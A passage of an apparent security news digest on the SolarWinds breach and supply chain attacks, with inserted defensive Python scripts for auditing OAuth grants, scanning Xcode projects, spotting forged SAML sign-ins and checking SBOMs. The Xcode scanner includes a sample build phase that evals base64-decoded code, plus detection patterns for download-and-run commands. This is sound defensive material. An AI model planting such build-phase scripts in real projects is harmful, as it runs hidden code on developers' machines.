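    {"id": "sp-1", "displayName": "Mail Archiver", "passwordCredentials": [],
     "keyCredentials": [{"keyId": "k-1", "type": "AsymmetricX509Cert",
                         "startDateTime": "2021-03-20T08:00:00+00:00",
                         "endDateTime": "2031-03-20T08:00:00+00:00"}]},
    {"id": "sp-2", "displayName": "Expense Helper", "keyCredentials": [],
     "passwordCredentials": [{"keyId": "p-1", "startDateTime": "2020-01-10T00:00:00+00:00",
                              "endDateTime": "2020-07-10T00:00:00+00:00"}]},
]
GRANTS = [  # constructed; consentType AllPrincipals means admin consent on behalf of every user
    {"id": "g-1", "clientId": "sp-1", "consentType": "AllPrincipals", "principalId": None,
     "resourceId": "graph", "scope": "User.Read Mail.Read offline_access"},
    {"id": "g-2", "clientId": "sp-2", "consentType": "Principal", "principalId": "user-7",
     "resourceId": "graph", "scope": "User.Read"},
]

def _finding(app, severity, message, remediation):
    return {"app": app["displayName"], "severity": severity,
            "message": message, "remediation": remediation}

def audit_grants(apps_by_id, grants):
    """Flag high-risk delegated scopes and offline_access (long-lived refresh tokens)."""
    findings = []
    for g in grants:
        app, scopes = apps_by_id[g["clientId"]], set(g["scope"].split())
        risky = sorted(scopes & HIGH_RISK_SCOPES)
        revoke = f"DELETE /oauth2PermissionGrants/{g['id']}"  # Graph call that revokes the grant
        if risky and g["consentType"] == "AllPrincipals":
            findings.append(_finding(app, "HIGH", f"tenant-wide consent for {risky}", revoke))
        elif risky:
            findings.append(_finding(app, "MEDIUM", f"user {g['principalId']} consented to {risky}", revoke))
        if "offline_access" in scopes:
            findings.append(_finding(app, "MEDIUM",
                "offline_access: refresh tokens keep working until the grant is revoked", revoke))
    return findings

def audit_credentials(apps, now=NOW):
    """Flag app certificates/secrets that were added recently (or are future-dated) or live unusually long."""
    findings = []
    for app in apps:
        for cred in app["keyCredentials"] + app["passwordCredentials"]:
            start = datetime.fromisoformat(cred["startDateTime"])
            end = datetime.fromisoformat(cred["endDateTime"])
            kind = cred.get("type", "client secret")
            remove = f"servicePrincipal removeKey/removePassword for keyId {cred['keyId']}"
            if now - start <= NEW_CRED_WINDOW:
                findings.append(_finding(app, "HIGH", f"{kind} added {(now - start).days} days ago", remove))
            if end - start > MAX_CRED_LIFETIME:
                findings.append(_finding(app, "MEDIUM", f"{kind} valid for {(end - start).days} days", remove))
    return findings

def audit(apps, grants, now=NOW):
    """Run both checks; in practice feed this the paged output of the Graph list endpoints."""
    apps_by_id = {a["id"]: a for a in apps}
    return audit_grants(apps_by_id, grants) + audit_credentials(apps, now)

if __name__ == "__main__":
    for f in audit(SERVICE_PRINCIPALS, GRANTS):
        print(f"[{f['severity']}] {f['app']}: {f['message']} -> {f['remediation']}")
```

Two caveats matter in practice. Resetting a user's password does not touch an app's consent grant or the refresh tokens issued under it, which is why the remediation column points at the grant and the credential rather than the user. And a credential added to an existing, already-consented service principal is exactly the quiet path the paragraph describes, so the "added recently" check should run on a schedule and diff against the previous run, not just once after an incident.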


_______________________________________________________________________________________

(March 23, 2021)


SolarWinds breach is one of the most challenging hacking incidents

The recent SolarWinds Senate hearing and a flurry of subsequent briefings have unearthed new questions around the attack. The acting director of the U.S. Cybersecurity and Infrastructure Security Agency (CISA), Brandon Wales, has called it the most complex and challenging hacking incident the agency has come up against.

Ref - CyberArk

_______________________________________________________________________________________

(March 23, 2021)


Microsoft proposes incentivizing digital solutions to mitigate supply chain risk

The first step in strengthening supply chain security is to carefully identify the risks. Once those risks are identified, the industry can then work with the government to define risk-mitigating best practices and tailored technology-enabled solutions. Technology may not eliminate the need for more traditional restrictive measures in all contexts. But in many areas, technology-enabled solutions can both strengthen security and sustain tech leadership.

Ref - Microsoft  

_______________________________________________________________________________________

(March 22, 2021)


The ‘Frankencloud’ model is the biggest security risk

According to a researcher, information technology environments have evolved into a “Frankenstein” model: firms scrambled to take advantage of the cloud while maintaining their existing systems of record, leaving them with systems riddled with complexity and built from disconnected parts.

Ref - TechCrunch

_______________________________________________________________________________________

(March 22, 2021)


The SolarWinds victims are now solidified

Brandon Wales, the acting director of the Cybersecurity and Infrastructure Security Agency, said that the list of victims from the attack on SolarWinds Orion has "solidified" and he is not expecting many more organizations to come forward. CISA is continuing to work with federal agencies to understand if any have been compromised.

Ref - FCW

_______________________________________________________________________________________

(March 22, 2021)


A report about SilverFish cyber-espionage group

The PRODAFT Threat Intelligence Team has published a report that gives an unusually clear look at the size and structure of organized cybercrime. It uncovered a global cybercrime campaign, run by a group dubbed SilverFish, that uses modern management methods and sophisticated tools, including its own malware testing sandbox. The group has strong ties to the SolarWinds attack, the EvilCorp group, and some other well-known malware campaigns.


_______________________________________________________________________________________

(March 22, 2021)


Shell is another victim of the Accellion supply chain hack

Energy giant Shell has disclosed a data breach, via a supply chain attack, after attackers compromised the company's secure file-sharing system powered by Accellion's File Transfer Appliance (FTA). Upon learning of the incident, Shell addressed the vulnerabilities with its service provider and cybersecurity team and started an investigation to better understand the nature and extent of the incident.


_______________________________________________________________________________________

(March 22, 2021)


The new insider threat of compromised partners

The current rash of financial fraud and supply chain attacks exploit a seemingly unsolvable vulnerability in security strategy. Attackers exploit the fact that a firm must communicate with its outside partners and vendors to thrive as a company or an institution. As they interact with partners, the door to exploitation opens, specifically in the form of supply chain attacks. These attacks are tremendously hard to detect since malware and malicious links are not necessary for successful exfiltration.


_______________________________________________________________________________________

(March 22, 2021)


Three vulnerabilities exposed during SolarWinds attack

SolarWinds attackers leveraged three key weaknesses in the current IT ecosystem. First, the software supply chain: they injected malware into the supplier's build, so the trojanized product carried them into each customer's core network. Second, single sign-on: once inside, they abused the federation infrastructure to reach cloud services. Third, traditional multifactor authentication, which did not stop them because a forged federation token already asserts that MFA was satisfied.

Ref - CPO Magazine 

_______________________________________________________________________________________

(March 22, 2021)


In wake of SolarWinds, Exchange attacks, the U.S. government calls for better information sharing

The new cybersecurity leadership in the Biden White House is exploring ways to establish new early warning systems that combine traditional intelligence-agency methods with private-sector expertise. Chief among the new approaches, reportedly, is deeper information sharing with the private sector.

Ref - CSO Online 

_______________________________________________________________________________________

(March 22, 2021)


KPMG advisory on SolarWinds attack

According to a recent KPMG advisory, each piece of malware used in the SolarWinds campaign had a tactical purpose. SUNSPOT was designed to run inside SolarWinds' software build environment and insert the SUNBURST backdoor into Orion at compile time. TEARDROP and RAINDROP were loaders used to deploy a modified version of Cobalt Strike. SUNSHUTTLE/GoldMax, GoldFinder, and Sibot are tools reported to have been used in environments with a pre-existing SUNBURST compromise.

Ref - KPMG

_______________________________________________________________________________________

(March 21, 2021)

How to prevent supply chain attacks?

The key to mitigating supply chain security risks is to ensure each of your third-party vendors complies with the strictest cybersecurity standards, whether or not regulatory requirements are enforced. Complacency is the main driver of supply chain exposure. To keep third-party vendors compliant, send security questionnaires to each of them on a regular basis to continuously scrutinize their security posture.

Ref - UpGuard

_______________________________________________________________________________________

(March 21, 2021)


CISA releases a tool to detect SolarWinds malicious activity

The U.S. CISA has released a new tool, the CISA Hunt and Incident Response Program (CHIRP), that detects malicious activity associated with the SolarWinds hackers in compromised on-premises enterprise environments. It is a forensics collection tool that CISA developed to help network defenders find IOCs associated with the activity detailed in CISA's alerts on this campaign.


_______________________________________________________________________________________

(March 20, 2021)


SolarWinds is a major disaster in the modern era of computing

Researcher Davi Ottenheimer has compared the SolarWinds attack to the Dust Bowl disaster. In his view, Microsoft for many years worked on an extremely expedited model with minimal security or ecosystem investment, inviting a predictable disaster.


_______________________________________________________________________________________

(March 20, 2021)


A Swiss firm has accessed servers of a SolarWinds hacker

A Swiss cybersecurity firm says it has accessed servers used by a hacking group (SilverFish) tied to the SolarWinds breach, revealing details about who the attackers targeted and how they carried out their operation. The firm, PRODAFT, also said the hackers have continued their campaign through this month.

Ref - ProDaft

_______________________________________________________________________________________

(March 18, 2021)


Xcode Project spreading MacOS malware to Apple developers

Cybercriminals are targeting Apple developers with a trojanized Xcode project which, once built, installs a backdoor with spying and data exfiltration capabilities. The malicious Xcode project, which researchers call XcodeSpy, installs a variant of the known EggShell backdoor on the developer's macOS computer.


_______________________________________________________________________________________

(March 18, 2021)


CISA releases detection tool for SolarWinds malicious activity 

The Cybersecurity and Infrastructure Security Agency (CISA) has released a new tool to detect post-compromise malicious activity associated with the SolarWinds hackers in on-premises enterprise environments. The new forensics collection tool, CISA Hunt and Incident Response Program (CHIRP), is Python-based and helps detect IOCs of SolarWinds-related malicious activity on Windows operating systems.


_______________________________________________________________________________________

(March 18, 2021)

SolarWinds-linked threat group SilverFish took advantage of enterprise victims

Swiss cybersecurity firm PRODAFT said that SilverFish, a threat group, has been responsible for intrusions at over 4,720 private and government organizations, including Fortune 500 companies, ministries, airlines, defense contractors, audit and consultancy companies, and automotive manufacturers. SilverFish has been connected to the recent SolarWinds breach as "one of many" threat groups taking advantage of the situation.

Ref - ZDNet

_______________________________________________________________________________________

(March 18, 2021)


Beware the Package Typosquatting Supply Chain Attack

Attackers are publishing packages whose names mimic those of existing packages on public registries, in the hope that users or developers will accidentally download the malicious package instead of the legitimate one.


_______________________________________________________________________________________

(March 18, 2021)


XcodeSpy malware can target iOS devs in a supply chain attack

A malicious Xcode project known as XcodeSpy is targeting iOS developers in a supply chain attack that installs a macOS backdoor on the developer's computer. As with other development environments, it is common for developers to create projects that perform specific functions and share them online so that other developers can add them to their own applications.
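Added example, not from the original page or from the researchers who reported XcodeSpy: a scanner for the build phase a trojanized project relies on. XcodeSpy was reported to deliver its payload through a Run Script build phase, which Xcode runs as soon as the shared project is built; that delivery mechanism, the indicator heuristics and the sample project.pbxproj below are assumptions made for this example. The check is meant to run on a downloaded project before anyone opens it in Xcode.

```python
"""Added example: flag suspicious Run Script build phases in an Xcode project.

XcodeSpy-style trojans ride in a PBXShellScriptBuildPhase so the payload runs
as soon as the victim builds the shared project. Scanning project.pbxproj
before building surfaces that phase. The heuristics and the sample project
below are constructed for this example.
"""
import re
from typing import Dict, List

# Constructed excerpt of a project.pbxproj (NeXTSTEP plist text), not a real project.
SAMPLE_PBXPROJ = r'''
// !$*UTF8*$!
{
	objects = {
		AA11 /* Run SwiftLint */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
		};
		BB22 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "mkdir -p ~/.local/share 2>/dev/null; eval \"$(echo ZWNobyBoaQo= | base64 -d)\" &\n";
		};
		CC33 /* Sources */ = {
			isa = PBXSourcesBuildPhase;
			files = (
			);
		};
	};
}
'''

# Indicator label -> pattern matched against the decoded shell script.
INDICATORS = [
    ("base64 decode", re.compile(r"base64\s+(-d|-D|--decode)\b")),
    ("eval of a generated string", re.compile(r"\beval\b")),
    ("download piped to interpreter",
     re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sh|bash|zsh|python\d?|perl|osascript)\b")),
    ("osascript", re.compile(r"\bosascript\b")),
    ("writes under a dotfile directory", re.compile(r"(~|\$HOME)/\.")),
    ("backgrounded process", re.compile(r"&\s*(\n|$)")),
]

# One object of the form `ID /* name */ = { ... };`; build phases contain no nested braces.
_PHASE = re.compile(r"(\w+) /\* (.*?) \*/ = \{(.*?)\n\s*\};", re.S)
# The script value, honouring backslash escapes so embedded \" does not end it early.
_SCRIPT = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";', re.S)


def _unescape(s: str) -> str:
    # pbxproj escapes embedded quotes, newlines and tabs inside string values.
    return s.replace('\\"', '"').replace("\\n", "\n").replace("\\t", "\t")


def scan_pbxproj(text: str) -> List[Dict[str, object]]:
    """Return one finding per Run Script phase that trips any indicator."""
    findings = []
    for obj_id, name, body in _PHASE.findall(text):
        if "isa = PBXShellScriptBuildPhase;" not in body:
            continue
        m = _SCRIPT.search(body)
        script = _unescape(m.group(1)) if m else ""
        hits = [label for label, pat in INDICATORS if pat.search(script)]
        if hits:
            findings.append({"id": obj_id, "name": name, "indicators": hits, "script": script})
    return findings


def demo() -> List[Dict[str, object]]:
    return scan_pbxproj(SAMPLE_PBXPROJ)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['id']} ({f['name']}): {', '.join(f['indicators'])}")
```

Run it against every `*.xcodeproj/project.pbxproj` in a checkout before building; a linting phase like the first one passes, while the second trips four indicators. Heuristics are a triage aid, not a verdict, so review any flagged script by hand rather than building to see what it does.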


_______________________________________________________________________________________

(March 18, 2021)


NSA, Homeland Security push service to mitigate cyber-attacks

The National Security Agency and the Department of Homeland Security are encouraging government agencies and high-risk companies to adopt Protective DNS (PDNS), in which a security provider resolves the organization's DNS queries and refuses to resolve domains known to be malicious, cutting off command-and-control and phishing connections before they are made. PDNS blocked connections to malicious websites millions of times in a recent test involving five U.S. defense contractors.

Ref - Bloomberg
 
_______________________________________________________________________________________

(March 18, 2021)


Will the U.S. never be safe from cyberattacks?

While Washington grapples with how to prevent another attack of this scale (the SolarWinds breach), the hard truth is this: there is no such thing as a foolproof cybersecurity defense, because human beings write computer code, and despite being incredibly smart, those people make mistakes. Each minuscule error creates one more pathway for hackers to launch cyberattacks.

Ref - Yahoo

_______________________________________________________________________________________

(March 18, 2021)


Rethinking Patch management after SolarWinds breach

The SolarWinds breach, in which hackers inserted malware into software updates sent to thousands of customers and created a backdoor into their IT systems, suggests organizations need to rethink patch management. To identify known and potential vulnerabilities, security leaders need a software bill of materials (SBOM) for the software and devices deployed in their environment, as well as for new updates and patches.


_______________________________________________________________________________________

(March 17, 2021)


Zero-trust helped Splunk dodge supply chain attack

Events like the SolarWinds breach are reminders of how important it is for organizations, especially high-profile organizations in industry and government, to have a zero-trust architecture in place. Many organizations are building out in-depth data analytics capabilities as part of a broader zero-trust strategy and then using them to improve visibility and security operations.


_______________________________________________________________________________________

(March 17, 2021)


SolarWinds attackers gained access to Mimecast’s production environment

Mimecast acknowledged that the threat actor responsible for the SolarWinds attack used the supply chain compromise to gain entry to a part of Mimecast’s production grid environment, accessing certain Mimecast-issued certificates and related customer-server-connection information.

Ref - SC Media

_______________________________________________________________________________________

(March 17, 2021)


Lawmakers drilled multiple agencies for SolarWinds attack

The bipartisan leaders of a House panel drilled multiple agencies for updates on the SolarWinds hack, a mass cyber campaign that compromised at least nine federal agencies and 100 private sector groups. Members of the Energy and Commerce Committee sent letters demanding answers to the leaders of the departments of Commerce, Energy, Health and Human Services, as well as the Environmental Protection Agency.

Ref - The Hill

_______________________________________________________________________________________

(March 17, 2021)


Spotting APT Activity associated with SolarWinds and Active Directory/M365 Compromise

CISA has released a table of tactics, techniques, and procedures used by the advanced persistent threat (APT) actor involved in the recent SolarWinds and Active Directory/M365 compromise. The table uses the MITRE ATT&CK framework to identify the APT's TTPs and includes detection recommendations. This information will assist network defenders in detecting and responding to this activity.

Ref - CISA

_______________________________________________________________________________________

(March 17, 2021)


Key takeaways for security admins from SolarWinds attacks

Security and IT admins can take note of several key points regarding supply chain attacks. Potential supply chain attack victims often lack the right tools to see inside the software they are handed. The Golden SAML attack, in which the attacker uses a stolen token-signing certificate from the on-premises federation server to forge SAML assertions for any user, allowed the attackers to jump from on-premises systems to cloud systems while effectively bypassing MFA, exposing the weaknesses in current authentication systems.

Ref - CSO Online 
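Added example, not from the original page or the articles cited above, of the detection that the Golden SAML discussion (here and in the "Three vulnerabilities" item above) implies. An assertion forged with a stolen signing key is accepted by the cloud tenant, but the on-premises federation server never logged issuing it, so federated sign-ins with no matching issuance event are the signal; the MFA claim inside the assertion proves nothing, because the forger writes it. The records, account names and time window below are constructed; in practice the issuance side comes from the federation server's audit log and the sign-in side from the cloud provider's sign-in log.

```python
"""Added example: spot SAML sign-ins the on-premises IdP never issued.

A Golden SAML attacker holds the AD FS token-signing key and mints assertions
offline, so the relying party (here, the cloud tenant) accepts a sign-in for
which the federation server has no matching issuance event. Correlating the
two logs is the detection; the MFA flag inside the assertion cannot be trusted
because the attacker writes it.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Iterable, List


@dataclass(frozen=True)
class TokenIssued:
    """One IdP issuance record (e.g. an AD FS 'token issued' audit event)."""
    when: datetime
    user: str
    relying_party: str


@dataclass(frozen=True)
class CloudSignIn:
    """One relying-party sign-in record that was authenticated via federation."""
    when: datetime
    user: str
    relying_party: str
    mfa_claimed: bool


def _t(s: str) -> datetime:
    return datetime.fromisoformat(s)


# Constructed sample records; not real log data.
RP = "urn:federation:MicrosoftOnline"
ISSUED = [
    TokenIssued(_t("2021-03-10T09:00:02"), "alice@corp.example", RP),
    TokenIssued(_t("2021-03-10T09:30:15"), "bob@corp.example", RP),
]
SIGNINS = [
    CloudSignIn(_t("2021-03-10T09:00:05"), "alice@corp.example", RP, True),
    CloudSignIn(_t("2021-03-10T09:30:18"), "bob@corp.example", RP, True),
    # Forged: claims MFA, but the IdP never issued a token for this account.
    CloudSignIn(_t("2021-03-10T11:47:51"), "svc-backup@corp.example", RP, True),
]


def find_unissued_signins(issued: Iterable[TokenIssued],
                          signins: Iterable[CloudSignIn],
                          window: timedelta = timedelta(minutes=5)) -> List[CloudSignIn]:
    """Return federated sign-ins with no IdP issuance for the same user and
    relying party within `window` before the sign-in."""
    issued = list(issued)
    suspicious = []
    for s in signins:
        matched = any(
            t.user.lower() == s.user.lower()
            and t.relying_party == s.relying_party
            and timedelta(0) <= s.when - t.when <= window
            for t in issued
        )
        if not matched:
            suspicious.append(s)
    return suspicious


def demo() -> List[str]:
    return [s.user for s in find_unissued_signins(ISSUED, SIGNINS)]


if __name__ == "__main__":
    for s in find_unissued_signins(ISSUED, SIGNINS):
        print(f"{s.when.isoformat()} {s.user} -> {s.relying_party}: "
              f"no IdP issuance (mfa_claimed={s.mfa_claimed})")
```

The window absorbs clock skew and the few seconds between issuance and redemption; a sign-in whose only "evidence" of MFA is the claim inside the assertion, with nothing on the issuing side, is exactly what a forged token looks like. The same comparison also catches tokens with a lifetime longer than the federation policy allows.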

_______________________________________________________________________________________

(March 17, 2021)


How the Linux Foundation’s software signing combats supply chain attacks

The Linux Foundation is launching sigstore, a free service jointly developed with Google, Red Hat, and Purdue University, that software developers can use to digitally sign their software releases. Signed releases let consumers verify who published an artifact before installing it, a defense that applies to attacks such as dependency confusion, in which a package manager is duped into fetching a remotely hosted, attacker-published package in place of a locally available resource of the same name, such as an internal library.


_______________________________________________________________________________________

(March 16, 2021)


Biden's supply chain EO may uncover these cyber risks

While the government continues to assess the scope and scale of that breach, the White House is now directing various executive departments to assess the risks in their respective supply chains. The executive order calls for both 100-day immediate reviews of certain products, as well as year-long sectoral supply chain reviews of the defense, health, transportation, and agriculture industries, among others.

Ref - FCW 

_______________________________________________________________________________________

(March 16, 2021)


Mimecast decommissioned SolarWinds Orion after hack

The Lexington, Mass.-based email security vendor - Mimecast - became one of the first SolarWinds hack victims to publicly announce they’re dumping the industry-leading Orion network monitoring platform for a competing product. Industry experts had considered it unlikely that the hack would lead to many customers getting rid of SolarWinds due to the unique visibility and monitoring features Orion offers.

Ref - CRN

_______________________________________________________________________________________

(March 16, 2021)


SolarWinds underestimated network’s role in security

According to Juniper Networks VP of Security Business and Strategy Samantha Madrid, the SolarWinds hack has put a fine point on the importance of network security. While the full scope of the supply chain attack remains under investigation, it brought network visibility and the need for security enforcement at every point of connection into sharper focus.


_______________________________________________________________________________________

(March 16, 2021)


Using CodeQL to spot traces of Solorigate

If a build server is backdoored with the build-hijacking component of the Solorigate campaign, the malware injects additional source code at compile time. If CodeQL is observing the build process on the infected server, it extracts the injected malicious source code together with the genuine source code, so the resulting CodeQL database contains traces of the malicious Solorigate source and can be queried for them.

Ref - GitHub

_______________________________________________________________________________________

(March 16, 2021)


Mimecast confirms that SolarWinds hackers used Sunburst malware for initial intrusion

Mimecast has confirmed that the state-sponsored SolarWinds hackers who breached its network earlier this year used the Sunburst backdoor during the initial intrusion. Using this entry point, the threat actor accessed certain Mimecast-issued certificates and related customer server connection information.


_______________________________________________________________________________________

(March 16, 2021)


How to prevent supply chain attacks?

Here are 11 cybersecurity strategies that could help prevent supply chain attacks: implement honeytokens, secure privileged access management, implement a zero trust architecture, assume a breach will happen, identify all potential insider threats, protect vulnerable resources, minimize access to sensitive data, implement strict shadow IT rules, send regular third-party risk assessments, monitor vendor networks for vulnerabilities, and identify all vendor data leaks.

Ref - UpGuard

_______________________________________________________________________________________

(March 16, 2021)


Software supply chain attacks are not easy to tackle

As companies scramble to investigate whether their own systems and data were potentially impacted by the SolarWinds compromise, executives, boards, and customers are discovering that the threat of supply chain attacks expands beyond this one single incident and that mitigating the risks associated with them is not straightforward.


_______________________________________________________________________________________

(March 15, 2021)


Security ratings could raise the bar on cyber hygiene

Plans from the Biden administration to release a product security rating system could raise the bar for security overall but won’t likely prevent the next SolarWinds or Microsoft hacks. Experts say the simplicity of that concept is both its strength and its weakness: it’s a concept that is easy to understand and could drive compliance with a set of standards, but it won’t prevent more sophisticated attacks.


_______________________________________________________________________________________

(March 15, 2021)


Better security approach against supply chain attacks 

Effective procurement language should be developed that holds a supplier or other third party contractually liable for the statements they make about the quality, reliability, and security of the software they provide. Organizations need to consider the software and service provider's processes when discussing a partnership and defining what security measures will be implemented.

Ref - Medium

_______________________________________________________________________________________

(March 15, 2021)


TIA reveals new global supply chain security standard - SCS 9001

The Telecommunications Industry Association (TIA) has published a new white paper on SCS 9001, the first process-based supply chain security standard for the information communications technology (ICT) industry. Scheduled to release later this year, the new standard will be measurable and verifiable as a means for service providers, manufacturers, and vendors to ensure that their supply chains meet the critical requirements needed to mitigate the risk of cybersecurity breaches and attacks.

Ref - Yahoo 

_______________________________________________________________________________________

(March 15, 2021)


SolarWinds attacks recovery could take the U.S. government 18 months

Brandon Wales, acting director of CISA, said that the U.S. government’s recovery effort from the SolarWinds supply chain attack could take well into 2022. This prediction reflects the complex nature of the breach and the length of time during which the attackers hid in their victims’ networks.


_______________________________________________________________________________________

(March 14, 2021)


White House seeks new cybersecurity approach after failing to detect hacks

The sophisticated hacks pulled off by Russia and China against a broad array of government and industrial targets in the United States, and the failure of the intelligence agencies to detect them, are driving the Biden administration and Congress to rethink how the nation should protect itself from growing cyber threats. Both operations were run from servers inside the United States, putting them out of reach of the NSA's early warning system.


_______________________________________________________________________________________

(March 14, 2021)

Software Bill Of Materials: an efficient mitigation strategy for supply chain attacks

There is an efficient mitigation strategy for supply chain attacks: the bill of materials, or “BOM”. In its simplest form, the BOM is similar to a long list of ingredients, in which all materials and quantities needed to manufacture an end product are listed. If the “BOM” is done with great precision, it is possible to provide deep insight into the product and all its parts and its corresponding supply chain vulnerabilities.

Ref - Medium
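Added example, not from the original page or the article cited above, of the check an SBOM makes possible (the "Rethinking patch management" item above makes the same point): read the component list from a CycloneDX document, recover each component's version (from the package URL when the version field is missing), and compare it against the affected ranges in an advisory feed. The SBOM, the advisory identifiers and the version ranges below are constructed for the example and are not real products or CVEs.

```python
"""Added example: check a CycloneDX SBOM against an advisory list.

The SBOM tells you which components (and versions) are inside a delivered
product or update; the advisories say which version ranges are affected.
The SBOM, the advisories, and their ids below are constructed for this
example and are not real products or CVEs.
"""
import json
import re
from typing import Dict, List, Optional, Tuple

SAMPLE_SBOM = json.dumps({
    "bomFormat": "CycloneDX",
    "specVersion": "1.4",
    "components": [
        {"type": "library", "name": "log-helper", "version": "2.14.1",
         "purl": "pkg:maven/example/log-helper@2.14.1"},
        # No explicit version: it must be recovered from the package URL.
        {"type": "library", "name": "xml-parse",
         "purl": "pkg:nuget/xml-parse@1.3.0"},
        {"type": "application", "name": "agent", "version": "2020.2.1",
         "purl": "pkg:generic/agent@2020.2.1"},
    ],
})

# Hypothetical advisories: a version is affected if introduced <= version < fixed.
ADVISORIES = [
    {"id": "ADV-0001", "name": "log-helper", "introduced": "2.0.0", "fixed": "2.15.0"},
    {"id": "ADV-0002", "name": "xml-parse", "introduced": "1.0.0", "fixed": "1.2.5"},
    {"id": "ADV-0003", "name": "agent", "introduced": "2019.4.0", "fixed": "2020.2.1"},
]


def version_key(v: str, width: int = 4) -> Tuple[int, ...]:
    """Numeric dotted version -> fixed-width tuple so '1.2' == '1.2.0' and
    '2.14.1' < '2.15.0'. Non-numeric suffixes ('-beta') are dropped."""
    parts = []
    for seg in v.split(".")[:width]:
        m = re.match(r"\d+", seg)
        parts.append(int(m.group()) if m else 0)
    return tuple(parts + [0] * (width - len(parts)))


def component_version(c: Dict) -> Optional[str]:
    """Prefer the version field; otherwise take it from the purl after '@'."""
    if c.get("version"):
        return c["version"]
    purl = c.get("purl", "")
    if "@" in purl:
        return purl.rsplit("@", 1)[1].split("?")[0]
    return None


def affected_components(sbom_json: str, advisories: List[Dict]) -> List[Tuple[str, str, str]]:
    """Return (name, version, advisory id) for every SBOM component whose
    version falls inside an advisory's affected range."""
    sbom = json.loads(sbom_json)
    hits = []
    for c in sbom.get("components", []):
        ver = component_version(c)
        if ver is None:
            continue
        vk = version_key(ver)
        for adv in advisories:
            if adv["name"] != c["name"]:
                continue
            if version_key(adv["introduced"]) <= vk < version_key(adv["fixed"]):
                hits.append((c["name"], ver, adv["id"]))
    return sorted(hits)


def demo() -> List[Tuple[str, str, str]]:
    return affected_components(SAMPLE_SBOM, ADVISORIES)


if __name__ == "__main__":
    for name, ver, adv in demo():
        print(f"{name} {ver} is affected by {adv}")
```

Only log-helper is reported: xml-parse is past its fix version, and agent sits exactly on the fixed version, which the half-open range correctly treats as patched. Run the same check against the SBOM that accompanies each update before it is approved, not just against the installed baseline.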

_______________________________________________________________________________________

(March 13, 2021)


Security best practices after SolarWinds supply chain attack

Implementing the supply chain security best practices can help mitigate third-party risk and meet the needs of the changing enterprise ecosystem. Users are recommended to conduct asset and access inventories, elevate third-party risk management and ensure third-party relationships are collaborative.


_______________________________________________________________________________________

(March 12, 2021)


A senior administration official on the response to the Microsoft and SolarWinds intrusions

According to a senior administration official, they are in week three of four-week remediation across the federal government. The compromised agencies were all tasked to do a particular set of activities and then were tasked to have an independent review of their work to ensure the adversary had been eradicated. Most of the agencies have completed that independent review and the rest will complete it by the end of March.


_______________________________________________________________________________________

(March 12, 2021)


SolarWinds and Microsoft hacks spark debate over western retaliation

Cyber experts have cautioned that retaliatory steps over the SolarWinds and Microsoft hacks may not be justified. The SolarWinds and Microsoft hacks are not instances of conflict in any conventional sense; they are espionage, and so part of the continual interaction between these states.


_______________________________________________________________________________________

(March 12, 2021)


The first-ever U.S. national cyber director after SolarWinds breach

The new national cyber director will be responsible for crafting a national cyber strategy as well as driving more consistency across civilian government networks. If disaster strikes, the director will serve as the point person in coordinating the government’s nonmilitary response. 

Ref - Fortune

_______________________________________________________________________________________

(March 11, 2021)


Risks of supply chain attacks for organizations

Supply chain security risks are not new, but recent headlines are a reminder for consumers to re-examine their security practices. The trojanized SolarWinds Orion update reached more than 18,000 organizations, and the incident may serve as the focal point for dealing with digital supply chain risks.

Ref - Synopsys

_______________________________________________________________________________________

(March 11, 2021)


Managing supply chain security risk 

After the SolarWinds attack, information security and risk management teams need to think beyond third-party and vendor risk management. Supply chain risk management should be built on existing standardized practices across many risk practices and disciplines, and it requires cooperation and collaborative relationships within all areas of the organization.


_______________________________________________________________________________________

(March 11, 2021)


Embedded devices are a blind spot in the SolarWinds attack

Discussion of the SolarWinds attackers has focused on how they moved through victim networks, whether into Office 365 or VMware, and on a separate campaign that exploited a bug in SolarWinds Orion. However, the industry is overlooking a more nefarious but equally plausible objective: attackers may have used SolarWinds as a pathway into key networks where they could access and burrow deep into the embedded devices in industrial control systems.

Ref - The Hill

_______________________________________________________________________________________

(March 11, 2021)


Nation-state hackers exploited the U.S. Internet security gap

U.S. lawmakers and security experts are voicing concern that foreign governments are staging cyberattacks using servers in the U.S., in an apparent effort to avoid detection by America’s principal cyberintelligence organization. When hackers recently targeted servers running Microsoft Corp.’s Exchange software, they employed U.S.-based computers from at least four service providers to mount their attack, according to an analysis by the threat intelligence company DomainTools LLC.


_______________________________________________________________________________________

(March 10, 2021)


Risks of integrating technology vulnerabilities into the foundational technology

SolarWinds attacks and other events in 2020 spotlight a new burden to manage for C-Suites/Boards: The malicious supply chain influences of nation-state intelligence services. In recent supply chain attacks, the adversaries are not just finding & exploiting technology vulnerabilities, but actually creating & integrating them into the foundational technology. 

Ref - Forbes

_______________________________________________________________________________________

(March 10, 2021)


Hacker group claims access to internal video feeds by compromising supplier

Hackers said they accessed internal video feeds at several companies, including Tesla Inc., and at public agencies by breaching the network of security-camera vendor Verkada Inc., the latest cybersecurity incident in which a supplier unwittingly opened a back door into client networks. The group found a username and password for a Verkada administrative account on the internet, permitting them to obtain the footage.


_______________________________________________________________________________________

(March 10, 2021)


How to beat the new breed of Supply Chain attacks

The plethora of new malware strains (e.g., SUNBURST, SUPERNOVA, GoldMax, Sibot, and GoldFinder) that have emerged in the wake of the SolarWinds breach should force all enterprises to take the supply chain attack vector seriously. Comparing traditional supply chain attacks with the recent SolarWinds and Microsoft hacks, it is clear that attackers have upped their game to a whole new level, both in sophistication and tactics.

Ref - SentinelOne 

_______________________________________________________________________________________

(March 10, 2021)


Monitoring the software supply chain in Microsoft environment

Microsoft has described ways to monitor the software development, build, and release process via Azure Sentinel, specifically to detect any NOBELIUM-related activity. The blog uses Microsoft’s security monitoring solution Azure Sentinel, and Microsoft’s cloud CI/CD solution Azure DevOps as the focus point, however, the monitoring principles and approaches could also be applied to other technology stacks.

Ref - Microsoft 

_______________________________________________________________________________________

(March 10, 2021)


SolarWinds is not an isolated event going forward - VMware Report

